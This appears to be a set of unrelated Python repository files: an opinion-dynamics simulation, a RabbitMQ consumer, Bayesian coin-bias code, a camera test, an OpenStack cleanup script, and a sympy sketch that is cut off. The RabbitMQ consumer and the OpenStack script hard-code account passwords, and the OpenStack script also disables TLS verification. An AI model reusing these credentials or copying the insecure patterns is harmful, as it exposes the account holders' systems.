] | regis@behmo.com |
3db4a83754e02e122fc2cd1b8bdeb19351c5c4ac | bddd590d1dbd082052bc733c04de0d90cb74952c | /TurnerSmaldinoFunctions.py | 77788c3d9b5cf581bdbae3dbb401175b03a5a2fc | [] | no_license | heraldkorsen/TSvsDF | 9c001c540cc62b02913184b1514eae1cedb7a6dd | 62057a1663de03c4742a69671bf7ab79b5d56fdc | refs/heads/main | 2023-08-15T00:09:27.438215 | 2021-09-28T15:25:02 | 2021-09-28T15:25:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,178 | py | import defSim as ds
import networkx as nx
import warnings
import random
import numpy as np
from defSim import NewTiesModifier
# custom initializer in which initial range can be varied
class RandomContinuousScaledInitializer(ds.RandomContinuousInitializer):
    """Attribute initializer that draws continuous opinions and rescales them.

    Every feature 'f01'..'fNN' is first drawn via defSim's continuous
    initializer on [0, 1] and then mapped linearly onto the narrower band
    [0.5 - scaling_factor / 2, 0.5 + scaling_factor / 2]. In addition, every
    agent receives a constant 'uncertainty' attribute.
    """

    def __init__(self, distribution: str = 'uniform', scaling_factor = None, uncertainty_moderates = None, num_features = None, **kwargs):
        """Store settings, warning about (and substituting) missing ones.

        :param distribution: distribution name for the raw draws
        :param scaling_factor: width of the opinion band centred on 0.5
        :param uncertainty_moderates: constant 'uncertainty' value per agent
        :param num_features: number of opinion features to initialize
        """
        if num_features is not None:
            self.num_features = num_features
        else:
            warnings.warn("Number of features not specified, using 1 as default")
            self.num_features = 1
        if scaling_factor is not None:
            self.factor = scaling_factor
        else:
            warnings.warn("Scaling factor not specified, using 1 as default")
            self.factor = 1
        if uncertainty_moderates is not None:
            self.uncertainty_moderates = uncertainty_moderates
        else:
            # message previously claimed "1" although 0.6 is the actual default
            warnings.warn("Uncertainty not specified, using 0.6 as default")
            self.uncertainty_moderates = 0.6
        self.distribution = distribution

    def initialize_attributes(self, network: nx.Graph, **kwargs):
        """Write 'uncertainty' and the scaled feature values onto every node."""
        offset = 0.5 - (self.factor / 2)
        for agent in network.nodes:
            network.nodes[agent]['uncertainty'] = self.uncertainty_moderates
        for feature_index in range(self.num_features):
            # feature names are 'f01', 'f02', ...
            name = 'f' + str("%02d" % (feature_index + 1))
            ds.set_continuous_attribute(network, name, distribution = self.distribution)
            # distinct loop variable: previously the node loop shadowed the
            # feature index, which worked only by accident
            for agent in network.nodes():
                network.nodes[agent][name] = network.nodes[agent][name] * self.factor + offset
# custom initializer in which initial range can be varied
class ExtremeScaledInitializer(ds.RandomContinuousInitializer):
    """Attribute initializer that sets every feature to one of two extremes.

    Each feature 'f01'..'fNN' independently becomes either
    0.5 - scaling_factor / 2 or 0.5 + scaling_factor / 2, chosen by a fair
    coin flip per node. In addition, every agent receives a constant
    'uncertainty' attribute.
    """

    def __init__(self, distribution: str = 'uniform', scaling_factor = None, uncertainty_moderates = None, num_features = None, **kwargs):
        """Store settings, warning about (and substituting) missing ones.

        :param distribution: kept for interface parity; unused by this class
        :param scaling_factor: width of the opinion band centred on 0.5
        :param uncertainty_moderates: constant 'uncertainty' value per agent
        :param num_features: number of opinion features to initialize
        """
        if num_features is not None:
            self.num_features = num_features
        else:
            warnings.warn("Number of features not specified, using 1 as default")
            self.num_features = 1
        if scaling_factor is not None:
            self.factor = scaling_factor
        else:
            warnings.warn("Scaling factor not specified, using 1 as default")
            self.factor = 1
        if uncertainty_moderates is not None:
            self.uncertainty_moderates = uncertainty_moderates
        else:
            # message previously claimed "1" although 0.6 is the actual default
            warnings.warn("Uncertainty not specified, using 0.6 as default")
            self.uncertainty_moderates = 0.6
        self.distribution = distribution

    def initialize_attributes(self, network: nx.Graph, **kwargs):
        """Write 'uncertainty' and the extreme feature values onto every node."""
        offset = 0.5 - (self.factor / 2)
        for agent in network.nodes:
            network.nodes[agent]['uncertainty'] = self.uncertainty_moderates
        for feature_index in range(self.num_features):
            name = 'f' + str("%02d" % (feature_index + 1))
            # distinct loop variable: previously the node loop shadowed the
            # feature index, which worked only by accident
            for agent in network.nodes():
                # coin flip between the two extremes of the scaled range
                network.nodes[agent][name] = random.choice([0, 1]) * self.factor + offset
from defSim import InfluenceOperator
from defSim.tools.NetworkDistanceUpdater import update_dissimilarity
from defSim.dissimilarity_component.dissimilarity_calculator import DissimilarityCalculator
from typing import List
class FlacheMacyInfluence(InfluenceOperator):
    """Opinion influence after Flache & Macy (2011): weighted averaging with
    optional smoothing/stubbornness, Gaussian noise, and (optionally negative)
    weights derived from pairwise dissimilarity.

    NOTE(review): contains what looks like leftover instrumentation (a
    warnings.warn on every influence step and a hard-coded "TEST SCALING"
    doubling of the state change) -- confirm intent before reuse.
    """
    def __init__(self, regime = 'many-to-one', modifiers = ["smooth"], noise_strength = 0):
        # NOTE(review): mutable default for `modifiers`; it is only ever
        # rebound below (never mutated in place), but a None sentinel would be safer.
        self.regime = regime
        self.modifiers = modifiers
        self.noise_strength = noise_strength
    def spread_influence(self,
                         network: nx.Graph,
                         agent_i: int,
                         agents_j: List[int] or int,
                         regime: str,
                         dissimilarity_measure: DissimilarityCalculator,
                         attributes: List[str] = None,
                         **kwargs) -> bool:
        """
        One influence step for `agent_i`: either refresh its edge
        dissimilarities or move its opinion(s) toward/away from `agents_j`.

        :param network: graph whose nodes carry opinion features and whose
            edges carry a 'dist' attribute
        :param agent_i: the focal (influenced) agent
        :param agents_j: neighbour(s) exerting influence (single id or list)
        :param regime: unused here; the regime stored on self is checked instead
        :param dissimilarity_measure: calculator used to refresh 'dist';
            defaults to Manhattan distance excluding 'uncertainty'
        :param attributes: feature names to consider; defaults to all node
            attributes except 'uncertainty'
        :returns: True if an opinion state was actually updated, else False
        """
        negative_weights = kwargs.get("allow_negative_weights", False)
        if dissimilarity_measure is None:
            dissimilarity_measure = ds.ManhattanDistance(exclude = ['uncertainty'])
        if self.regime not in ['many-to-one', 'one-to-one']:
            raise NotImplementedError('Only many-to-one influence is implemented based on Flache & Macy 2011')
        if attributes is None:
            # if no specific attributes were given, take all of them
            attributes = [feature for feature in list(network.nodes[agent_i].keys()) if feature != "uncertainty"]
        # check modifiers (accept a single modifier passed as a bare string)
        if type(self.modifiers) != list:
            self.modifiers = [self.modifiers]
        if not all([modifier in ["influence_off", "smooth", "stubborn", "states_and_weights", "all_states", "noise_all_features"] for modifier in self.modifiers]):
            # NOTE(review): '__class__' here is literal text, never interpolated
            warnings.warn("Unrecognized modifier in __class__.")
        # variable to return at the end of function
        success = False
        # In every step, the selected agent either updates the weights (distances)
        # or gets influenced on a randomly selected state
        if 'states_and_weights' in self.modifiers:
            update_state = True
            update_weights = True
        else:
            # fair coin flip: refresh weights OR opinions this step, never both
            update_weights_and_not_state = random.choice([True, False])
            update_weights = update_weights_and_not_state
            update_state = not update_weights_and_not_state
        if 'all_states' in self.modifiers:
            update_all_states = True
        else:
            update_all_states = False
        # turn influence off, leaving only noise?
        influence_off = 'influence_off' in self.modifiers
        # apply noise to all features together
        noise_all_features = 'noise_all_features' in self.modifiers
        if noise_all_features and not update_all_states:
            warnings.warn("Applying noise to all features, but only one feature updated each step")
        if update_weights:
            # NOTE: because defSim assumes undirected networks, and distance is an edge
            # attribute, distances are updated for i --> j and j --> i simultaneously
            update_dissimilarity(network, [agent_i], dissimilarity_measure)
            # a weight-only step does not count as successful influence:
            #success = True
        if update_state:
            if update_all_states:
                influenced_features = attributes
            else:
                influenced_features = [random.choice(attributes)]
            # NOTE(review): fires on every single influence step -- looks like
            # leftover debug instrumentation rather than a deliberate warning
            warnings.warn("Influenced features == {}".format(influenced_features))
            if noise_all_features:
                # draw ONE noise value, shared by all features this step
                if self.noise_strength > 0:
                    noise_value = np.random.normal(scale = self.noise_strength) # TS18 use normal, with sd to scale noise
                else:
                    noise_value = 0
            for influenced_feature in influenced_features:
                #print("Influenced feature: {}".format(influenced_feature))
                #print("Base feature value agent i: {}".format(network.nodes[agent_i][influenced_feature]))
                #print("::::::::::::::::START OF INFLUENCE::::::::::::::::")
                # in case of one-to-one, j is only one agent, but we still want to iterate over it
                if type(agents_j) != list:
                    agents_j = [agents_j]
                set_of_influencers = agents_j
                #print("Influence from neighbors: {}".format(set_of_influencers))
                if len(set_of_influencers) != 0:
                    # Weights based on Flache & Macy 2011 Equation 1 / 1a
                    # Based on attribute distance between agents, under the assumption that these
                    # distances are calculated as Manhattan distance scaled by number of features
                    # Both equations are adjusted for the [0,1] opinion scale in defSim, as opposed
                    # to the [-1, 1] opinion scale in Flache & Macy 2011
                    # Maximum distance between agents is 1. Maximally distant agents have weight 0
                    # if negative weights are not allowed, else -1
                    if negative_weights:
                        weights = [1 - (2 * network.edges[agent_i, agent_j]['dist']) for agent_j in set_of_influencers]
                    else:
                        weights = [1 - (network.edges[agent_i, agent_j]['dist']) for agent_j in set_of_influencers]
                    # Raw state change of agent i's opinion on the selected influenced feature
                    # based on weights and differences for each neighbor (Equation 2)
                    feature_differences = [network.nodes[agent_j][influenced_feature] - network.nodes[agent_i][influenced_feature] for agent_j in set_of_influencers]
                    weighted_feature_differences = [weights[i] * feature_differences[i] for i in range(len(set_of_influencers))]
                    overall_state_change = sum(weighted_feature_differences) / (2 * len(set_of_influencers))
                    # Turn influence off completely?
                    if influence_off:
                        overall_state_change = 0 # set influence to 0, so any movement is noise
                    if not noise_all_features:
                        # per-feature noise draw
                        if self.noise_strength > 0:
                            noise_value = np.random.normal(scale = self.noise_strength) # TS18 use normal, with sd to scale noise
                            #print("noise", noise_value)
                        else:
                            noise_value = 0
                    overall_state_change = overall_state_change + noise_value
                    #print("resulting feature value", network.nodes[agent_i][influenced_feature])
                    ###### TEST SCALING #####
                    # NOTE(review): hard-coded doubling of the state change;
                    # apparently experimental -- confirm before relying on it
                    overall_state_change = 2 * overall_state_change
                    # Apply smoothing as desired ('smooth' is also the fallback
                    # when neither adjustment modifier is present)
                    if 'stubborn' in self.modifiers:
                        overall_state_change = self._apply_stubbornness(overall_state_change, target = agent_i, influenced_feature = influenced_feature, network = network)
                    if 'smooth' in self.modifiers or not any([adjust_function in self.modifiers for adjust_function in ['smooth', 'stubborn']]):
                        overall_state_change = self._apply_smoothing(overall_state_change, target = agent_i, influenced_feature = influenced_feature, network = network)
                    # Adjusted state of agent i's opinion on the selected influence feature
                    network.nodes[agent_i][influenced_feature] = network.nodes[agent_i][influenced_feature] + overall_state_change
                    # Bind to opinion range [0,1]
                    network.nodes[agent_i][influenced_feature] = min(1, max(0, network.nodes[agent_i][influenced_feature]))
                    success = True
                #print("::::::::::::::::END OF INFLUENCE::::::::::::::::")
        return success
    def _apply_smoothing(self, overall_state_change, target, influenced_feature, network):
        # based on Equation 2a with Corrigendum 2017: dampen the change by the
        # remaining headroom toward the bound the change is moving toward
        if overall_state_change > 0:
            overall_state_change = (overall_state_change * (1 - network.nodes[target][influenced_feature]))
        else:
            overall_state_change = (overall_state_change * (0 + network.nodes[target][influenced_feature]))
        return overall_state_change
    def _apply_stubbornness(self, overall_state_change, target, influenced_feature, network):
        # based on Equation 2a WITHOUT Corrigendum 2017: the damping factor is
        # chosen by which half of the scale the current opinion lies in
        if network.nodes[target][influenced_feature] > 0.5:
            overall_state_change = (overall_state_change * (1 - network.nodes[target][influenced_feature]))
        else:
            overall_state_change = (overall_state_change * (0 + network.nodes[target][influenced_feature]))
        return overall_state_change
# Implementing an output reporter which calculates polarization at the end of each run
## Output reporters are implemented based on the OutputTableCreator base class https://github.com/marijnkeijzer/defSim/blob/master/defSim/tools/CreateOutputTable.py
## Every output reporter should implement a static method called 'create_output', which calculates and returns the desired output
## Give the reporter a label if you want to customize the column name in the output
## Examples: https://github.com/marijnkeijzer/defSim/blob/master/defSim/tools/OutputMeasures.py
class PolarizationReporter(ds.tools.CreateOutputTable.OutputTableCreator):
    """Output reporter: polarization as the variance of pairwise opinion distances."""

    label = "Polarization"

    @staticmethod
    def create_output(network: nx.Graph, distance = "Manhattan", **kwargs):
        """
        Will calculate polarization for a given network.

        Polarization is the variance of the pairwise opinion distances over
        all unordered agent pairs. Each pairwise distance is the mean absolute
        difference across all node attributes except those in
        ``kwargs['exclude_polarization']`` (default: ['uncertainty']).
        Distances are recomputed here because during the simulation they are
        only maintained between directly connected agents.

        :param network: A networkx graph on which to calculate polarization
        :param distance: currently unused; kept for interface compatibility
        :return: A single value for polarization (variance of distances).
        """
        distances = []
        agents = list(network.nodes())
        exclude = kwargs.get('exclude_polarization', ['uncertainty'])
        # visit every unordered pair exactly once; the last agent has no new
        # partner, so it is skipped as the first member of a pair
        for position, agent1_id in enumerate(agents[:-1]):
            agent1_attributes = np.array([v for k, v in network.nodes[agent1_id].items() if k not in exclude])
            # FIX: previously `agents[agents.index(agent1_id + 1):]`, which is
            # only correct when nodes are labelled 0..n-1; positional slicing
            # works for arbitrary node labels
            for agent2_id in agents[position + 1:]:
                agent2_attributes = np.array([v for k, v in network.nodes[agent2_id].items() if k not in exclude])
                # mean absolute difference across all features
                distance_pairs = abs(agent2_attributes - agent1_attributes)
                distances.append(sum(distance_pairs) / len(distance_pairs))
        # variance of the pairwise distances
        return np.var(distances)
class SimulationWithNewTies(ds.Simulation):
    """defSim Simulation variant that can add random new ties during a warm-up phase."""

    def run_simulation(self, initialize: bool = True):
        """
        This method initializes the network if none is given, initializes the attributes of the agents, and also
        computes and sets the distances between each neighbor.
        It then calls different functions that execute the simulation based on which stop criterion was selected.

        If both 'new_ties_probability' and 'new_ties_in_iteration' are present
        in the parameter dict, that many warm-up iterations are run first, each
        followed by random tie formation and a network-wide dissimilarity
        refresh.

        :param bool=True initialize: Initialize the simulation before running (disable if initialization was
            done separately)
        :returns: A Pandas DataFrame that contains one row of data. To see what output the output contains see
            :func:`~create_output_table`
        """
        if initialize:
            self.initialize_simulation()
        if self.influence_function == 'list':
            # the concrete influence function was deferred to the parameter dict
            self.influence_function = self.parameter_dict['influence_function']
        if 'initialize_uncertainty' in self.parameter_dict:
            if self.parameter_dict['initialize_uncertainty']:
                # uncertainty is highest for moderate f01 opinions (near 0.5)
                for agent in self.network.nodes:
                    self.network.nodes[agent]['uncertainty'] = 1 - abs(self.network.nodes[agent]['f01'] - 0.5)
        # Default: no warm-up iterations. FIX: previously this name was only
        # bound inside the branch below, so the 'max_iteration' branch raised
        # NameError whenever the tie parameters were absent.
        new_ties_in_iteration = 0
        if all([ties_parameter in self.parameter_dict.keys() for ties_parameter in ['new_ties_probability', 'new_ties_in_iteration']]):
            new_ties_probability = self.parameter_dict['new_ties_probability']
            new_ties_in_iteration = self.parameter_dict['new_ties_in_iteration']
            for iteration in range(new_ties_in_iteration):
                self.run_simulation_step()
                NewTiesModifier(new_ties_probability = new_ties_probability).rewire_network(self.network)
                self.dissimilarity_calculator.calculate_dissimilarity_networkwide(self.network)
        if self.stop_condition == "pragmatic_convergence":
            self._run_until_pragmatic_convergence()
        elif self.stop_condition == "strict_convergence":
            self._run_until_strict_convergence()
        elif self.stop_condition == "max_iteration":
            # warm-up steps already consumed part of the iteration budget
            self.max_iterations = self.max_iterations - new_ties_in_iteration
            self._run_until_max_iteration()
        else:
            raise ValueError("Can only select from the options ['pragmatic_convergence', 'strict_convergence', 'max_iteration']")
return self.create_output_table() | [
"diekobakker@hotmail.com"
] | diekobakker@hotmail.com |
62e744b70c8b3536aaee4fc8c765a74a4202d779 | d5df2e08a1d4064d0c34db7e1e23823b44fa62fa | /workers/project/consumers/test_queue_receive.py | 7d40df75611dd81bf6eba045c7ec503faeb879c6 | [
"MIT"
] | permissive | sharof2000/ms-fastapi-template | 42c1f68f3260e8facad6984abada9f3d56363e05 | 5bbd6903305db07cc18330ec86fb04ca518e9dab | refs/heads/main | 2023-07-06T21:28:13.558790 | 2021-08-13T13:52:12 | 2021-08-13T13:52:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | import asyncio
from aio_pika import connect, IncomingMessage
async def on_message(message: IncomingMessage):
    """Print the incoming message and its body, then simulate slow processing.

    Defined as a coroutine purely to demonstrate that async handlers work
    with the consumer; a plain function would also be accepted.
    """
    print(f" [x] Received message {message!r}")
    print(f"Message body is: {message.body!r}")
    print("Before sleep!")
    await asyncio.sleep(5)  # stands in for real async I/O work
    print("After sleep!")
async def main(loop):
    """Connect to the broker, open a channel and start consuming 'hello'.

    NOTE(review): broker credentials are hard-coded into the URL below.
    """
    broker_connection = await connect(
        "amqp://farlley_ferreira:mstemplate123@localhost:5672", loop=loop
    )
    channel = await broker_connection.channel()
    hello_queue = await channel.declare_queue("hello")
    # no_ack=True: messages count as delivered without explicit acknowledgement
    await hello_queue.consume(on_message, no_ack=True)
if __name__ == "__main__":
    # Create the event loop and schedule the consumer setup on it.
    loop = asyncio.get_event_loop()
    loop.create_task(main(loop))
    # we enter a never-ending loop that waits for data and
    # runs callbacks whenever necessary.
    print(" [*] Waiting for messages. To exit press CTRL+C")
loop.run_forever() | [
"farlley@live.com"
] | farlley@live.com |
97e64193f5358c77e438e18a4f0c3aeff796f0e1 | 74c5d1736d53cf872a95664caccacfe324a9f5e3 | /chapter4/euro.py | f76fe1e514a6201771b2adbcc6363ecb9b734d4b | [
"Apache-2.0"
] | permissive | lmy86263/Think-Bayes | e773f474ec550dfb550763351b106f23eab4bf8d | ddf772832fe5ce9547081ebedf71fd2d9438b423 | refs/heads/master | 2020-04-29T11:44:08.226453 | 2019-01-05T10:43:39 | 2019-01-05T10:43:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | """This file contains code for use with "Think Bayes",
by Allen B. Downey, available from greenteapress.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
"""This file contains a partial solution to a problem from
MacKay, "Information Theory, Inference, and Learning Algorithms."
Exercise 3.15 (page 50): A statistical statement appeared in
"The Guardian" on Friday January 4, 2002:
When spun on edge 250 times, a Belgian one-euro coin came
up heads 140 times and tails 110. 'It looks very suspicious
to me,' said Barry Blight, a statistics lecturer at the London
School of Economics. 'If the coin were unbiased, the chance of
getting a result as extreme as that would be less than 7%.'
MacKay asks, "But do these data give evidence that the coin is biased
rather than fair?"
"""
import thinkbayes
import thinkplot
FORMATS = ['png']  # image formats passed to thinkplot.Save
class Euro(thinkbayes.Suite):
    """Hypotheses about x, the probability that the coin comes up heads."""

    def Likelihood(self, data, hypo):
        """Likelihood of one spin outcome under a heads-probability hypothesis.

        hypo: integer percent chance of heads (0-100)
        data: 'H' for heads, anything else for tails
        """
        heads_prob = hypo / 100.0
        return heads_prob if data == 'H' else 1 - heads_prob
class Euro2(thinkbayes.Suite):
    """Hypotheses about x, updated with a whole dataset at once."""

    def Likelihood(self, data, hypo):
        """Likelihood of an entire (heads, tails) count pair.

        hypo: integer percent chance of heads (0-100)
        data: tuple of (number of heads, number of tails)
        """
        heads, tails = data
        p = hypo / 100.0
        return (p ** heads) * ((1 - p) ** tails)
def UniformPrior():
    """Return a Euro suite with equal prior weight on x = 0..100."""
    return Euro(range(0, 101))
def TrianglePrior():
    """Return a Euro suite with a triangle-shaped prior peaking at x = 50."""
    suite = Euro()
    # min(x, 100 - x) rises linearly to 50 and falls back symmetrically
    for x in range(0, 101):
        suite.Set(x, min(x, 100 - x))
    suite.Normalize()
    return suite
def RunUpdate(suite, heads=140, tails=110):
    """Feed the observed spins into the suite, one outcome at a time.

    suite: Suite object
    heads: number of observed heads
    tails: number of observed tails
    """
    for outcome in 'H' * heads + 'T' * tails:
        suite.Update(outcome)
def Summarize(suite):
    """Print point estimates, percentiles and a 90% credible interval."""
    print(suite.Prob(50))
    print('MLE', suite.MaximumLikelihood())
    print('Mean', suite.Mean())
    for caption, pct in [('Median', 50), ('5th %ile', 5), ('95th %ile', 95)]:
        print(caption, thinkbayes.Percentile(suite, pct))
    print('CI', thinkbayes.CredibleInterval(suite, 90))
def PlotSuites(suites, root):
    """Plot the given suites as PMFs and save the figure.

    suites: list of Suite objects
    root: filename stem for the saved figure
    """
    thinkplot.Clf()
    thinkplot.PrePlot(len(suites))
    thinkplot.Pmfs(suites)
    thinkplot.Save(root=root, xlabel='x', ylabel='Probability', formats=FORMATS)
def main():
    """Build both priors, plot them, run the update, and plot the posteriors."""
    suite1 = UniformPrior()
    suite1.name = 'uniform'
    suite2 = TrianglePrior()
    suite2.name = 'triangle'
    # priors side by side
    PlotSuites([suite1, suite2], 'euro2')
    # update each suite with the observed spins and report summaries
    for suite in (suite1, suite2):
        RunUpdate(suite)
        Summarize(suite)
    # posteriors: uniform alone, then both together
    PlotSuites([suite1], 'euro1')
    PlotSuites([suite1, suite2], 'euro3')
if __name__ == '__main__':
    # run the full prior -> update -> posterior analysis as a script
    main()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
08064990a0dcafa4325234669d80f5cbe88b2e77 | 17b13a3ea2dae8af3a2e1ba5870af327864c82c3 | /PIPCamTest.py | 26bfd1d5ed94fb5190a90f191b78b256bb8b9596 | [] | no_license | yfaney/PIPCam | 4ffc5fa0841605b74eceb4481367684a3d5bf66a | ee5d4ad83e909a599696d4d81132da1f556517c2 | refs/heads/master | 2021-01-19T17:44:26.914342 | 2015-08-28T00:00:50 | 2015-08-28T00:00:50 | 37,951,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #!/usr/bin/python
import time
import picamera
# Warm the camera up briefly, then capture a single still image.
with picamera.PiCamera() as cam:
    cam.resolution = (1024, 768)
    cam.start_preview()
    time.sleep(2)  # give auto-exposure/white balance time to settle
    cam.capture('foo.jpg')
| [
"yfaney@gmail.com"
] | yfaney@gmail.com |
41e96ff1b900bad193ede0a539a9524362b80c2c | ec772836e4c7a3cc19d9a7d1efabc841de58c548 | /clear_all.py | c6b289ddbab306dae258cc3f3c616c53947640cb | [] | no_license | life1347/cloudsproject | 173c23b1cb4758579c8a8853c5ba6e459f3a0712 | c8d485ed3780dd66b73fe2a0c95dc387ed63b28f | refs/heads/master | 2021-06-04T03:28:04.147098 | 2014-01-08T10:37:33 | 2014-01-08T10:37:33 | 14,948,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | import time
import string
import logging
from time import sleep, asctime
from keystoneclient.v2_0 import client as ksclient
from neutronclient.v2_0 import client as neclient
from novaclient.v1_1 import client as nclient
import novaclient.exceptions as nova_exc
logging.basicConfig(level=logging.INFO)
#logging.basicConfig(level=logging.DEBUG)
# Keystone identity endpoint of the target OpenStack deployment.
KEYSTONE_URL='https://openstack.nctu.edu.tw/keystone/v2.0'
# Parallel credential lists: index i selects one account across all three.
# SECURITY NOTE(review): credentials are hard-coded in source; move them to
# environment variables or a config file outside version control.
username = ['0256547','0256081','0256017','0156153']
password = ['03067','2','persevere80419@gmail.com','swluo@cs.nctu.edu.tw']
tenant_name=['CloudOS2013_0256547','CloudOS2013_0256081','CloudOS2013_0256017','CloudOS2013_0156153']
def delete_all_vm(now):
    """Delete every instance whose name starts with the ``VM_`` prefix.

    Args:
        now: index into the module-level ``username``/``password``/
             ``tenant_name`` lists selecting which OpenStack account to use.
    """
    nc = nclient.Client(auth_url=KEYSTONE_URL, username=username[now],
                        api_key=password[now], project_id=tenant_name[now],
                        service_type='compute', insecure=True)
    for server in nc.servers.list():
        # Only touch instances that follow the "VM_<suffix>" naming scheme.
        if server.name.split('_')[0] == 'VM':
            print('Delete %s' % server.name)
            try:
                nc.servers.delete(server.id)
            except Exception as exc:
                # Best-effort cleanup: keep deleting the remaining VMs,
                # but record the failure instead of swallowing it silently.
                logging.warning('failed to delete %s: %s', server.name, exc)
def delete_network(now):
    """Tear down the per-user router, subnet interface and network.

    Deletion order matters: the router interface must be detached from the
    subnet before the router and the network themselves can be removed.

    Args:
        now: index into the module-level credential lists selecting which
             OpenStack account to use.
    """
    ne = neclient.Client(auth_url=KEYSTONE_URL, username=username[now],
                         tenant_name=tenant_name[now], password=password[now],
                         insecure=True)
    router_name = username[now] + '_router'
    network_name = username[now] + '_network'
    subnet_name = username[now] + '_subnet'
    # BUG FIX: list_networks() returns {'networks': [...]}, which is always
    # truthy even when no network matches -- inspect the result list itself.
    networks = ne.list_networks(name=network_name)['networks']
    if not networks:
        return
    try:
        router_id = ne.list_routers(name=router_name)['routers'][0]['id']
        subnet_id = ne.list_subnets(name=subnet_name)['subnets'][0]['id']
        ne.remove_interface_router(router_id, {'subnet_id': subnet_id})
        ne.delete_router(router_id)
        ne.delete_network(networks[0]['id'])
    except Exception as exc:
        # Best-effort: resources may already be partially deleted; log
        # instead of silently discarding the error.
        logging.warning('failed to delete network %s: %s', network_name, exc)
# Clean up only account index 2 (user '0256017'); the other accounts in
# the credential lists are left untouched.
delete_all_vm(2)
delete_network(2)
| [
"persevere80419@gmail.com"
] | persevere80419@gmail.com |
3bad1f5d7a9cbe455fa5ede29a60ec085415bb3a | 716b26f5e6dda95be2d3c6106939b0c114037e96 | /Sympy/ideal_bar_model_and_numerical_dispersion_relationships_via_sympy.py | 2530a20cba8fa067637aa6749fd8656fa2f85ba8 | [] | no_license | mariusono/Physical-Modelling-of-Spring-Reverberation | 66ab0bf0b23dfda035f92cbfc1a76ea1e2a7d528 | 16ae5b74a6ecad37f7f3ec8a034090e1f291421a | refs/heads/master | 2023-03-08T03:15:50.272602 | 2021-02-25T10:08:14 | 2021-02-25T10:08:14 | 267,653,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,508 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 29 00:06:29 2020
@author: MSOI
"""
from sympy import *
import numpy as np
import matplotlib.pyplot as plt
import re
import copy
I,eta,Kappa,k,Dxx,u,Dxxxx,q_slash,q,gamma,alpha,sig_t,sig_l,Dxmin,Dxpl,zeta,theta,Mx,sig_0,sig_1 = symbols('I,eta,Kappa,k,Dxx,u,Dxxxx,q_slash,q,gamma,alpha,sig_t,sig_l,Dxmin,Dxpl,zeta,theta,Mx,sig_0,sig_1')
U,Z,beta = symbols('U,Z,beta')
z,w,x,t,beta,K,k,mu,h = symbols('z,w,x,t,beta,K,k,mu,h')
from sympy import I
u_lm0_nm0,u_lm0_nm1,u_lm0_nm2,u_lm1_nm0,u_lm1_nm1,u_lm1_nm2,u_lm2_nm0,u_lm2_nm1,u_lm2_nm2,u_lp0_np0,u_lp0_np1,u_lp0_np2,u_lp1_np0,u_lp1_np1,u_lp1_np2,u_lp2_np0,u_lp2_np1,u_lp2_np2,zeta_lm0_nm0,zeta_lm0_nm1,zeta_lm0_nm2,zeta_lm1_nm0,zeta_lm1_nm1,zeta_lm1_nm2,zeta_lm2_nm0,zeta_lm2_nm1,zeta_lm2_nm2,zeta_lp0_np0,zeta_lp0_np1,zeta_lp0_np2,zeta_lp1_np0,zeta_lp1_np1,zeta_lp1_np2,zeta_lp2_np0,zeta_lp2_np1,zeta_lp2_np2 = symbols('u_lm0_nm0,u_lm0_nm1,u_lm0_nm2,u_lm1_nm0,u_lm1_nm1,u_lm1_nm2,u_lm2_nm0,u_lm2_nm1,u_lm2_nm2,u_lp0_np0,u_lp0_np1,u_lp0_np2,u_lp1_np0,u_lp1_np1,u_lp1_np2,u_lp2_np0,u_lp2_np1,u_lp2_np2,zeta_lm0_nm0,zeta_lm0_nm1,zeta_lm0_nm2,zeta_lm1_nm0,zeta_lm1_nm1,zeta_lm1_nm2,zeta_lm2_nm0,zeta_lm2_nm1,zeta_lm2_nm2,zeta_lp0_np0,zeta_lp0_np1,zeta_lp0_np2,zeta_lp1_np0,zeta_lp1_np1,zeta_lp1_np2,zeta_lp2_np0,zeta_lp2_np1,zeta_lp2_np2')
u_lm0_np0,u_lm0_np1,u_lm0_np2,u_lm1_np0,u_lm1_np1,u_lm1_np2,u_lm2_np0,u_lm2_np1,u_lm2_np2,u_lp0_nm0,u_lp0_nm1,u_lp0_nm2,u_lp1_nm0,u_lp1_nm1,u_lp1_nm2,u_lp2_nm0,u_lp2_nm1,u_lp2_nm2,zeta_lm0_np0,zeta_lm0_np1,zeta_lm0_np2,zeta_lm1_np0,zeta_lm1_np1,zeta_lm1_np2,zeta_lm2_np0,zeta_lm2_np1,zeta_lm2_np2,zeta_lp0_nm0,zeta_lp0_nm1,zeta_lp0_nm2,zeta_lp1_nm0,zeta_lp1_nm1,zeta_lp1_nm2,zeta_lp2_nm0,zeta_lp2_nm1,zeta_lp2_nm2 = symbols('u_lm0_np0,u_lm0_np1,u_lm0_np2,u_lm1_np0,u_lm1_np1,u_lm1_np2,u_lm2_np0,u_lm2_np1,u_lm2_np2,u_lp0_nm0,u_lp0_nm1,u_lp0_nm2,u_lp1_nm0,u_lp1_nm1,u_lp1_nm2,u_lp2_nm0,u_lp2_nm1,u_lp2_nm2,zeta_lm0_np0,zeta_lm0_np1,zeta_lm0_np2,zeta_lm1_np0,zeta_lm1_np1,zeta_lm1_np2,zeta_lm2_np0,zeta_lm2_np1,zeta_lm2_np2,zeta_lp0_nm0,zeta_lp0_nm1,zeta_lp0_nm2,zeta_lp1_nm0,zeta_lp1_nm1,zeta_lp1_nm2,zeta_lp2_nm0,zeta_lp2_nm1,zeta_lp2_nm2')
## Test on 1d wave
expr = diff(U*exp(I*(w*t+beta*x)),t,t) - gamma**2*( diff(U*exp(I*(w*t+beta*x)),x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
## Test on the ideal bar
## Analytical:
expr = diff(U*exp(I*(w*t+beta*x)),t,t) + K**2*( diff(U*exp(I*(w*t+beta*x)),x,x,x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
expr = diff(U*exp(I*(w*t+beta*x)),t,t) + K**2*( diff(U*exp(I*(w*t+beta*x)),x,x,x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
## Explitict FDS:
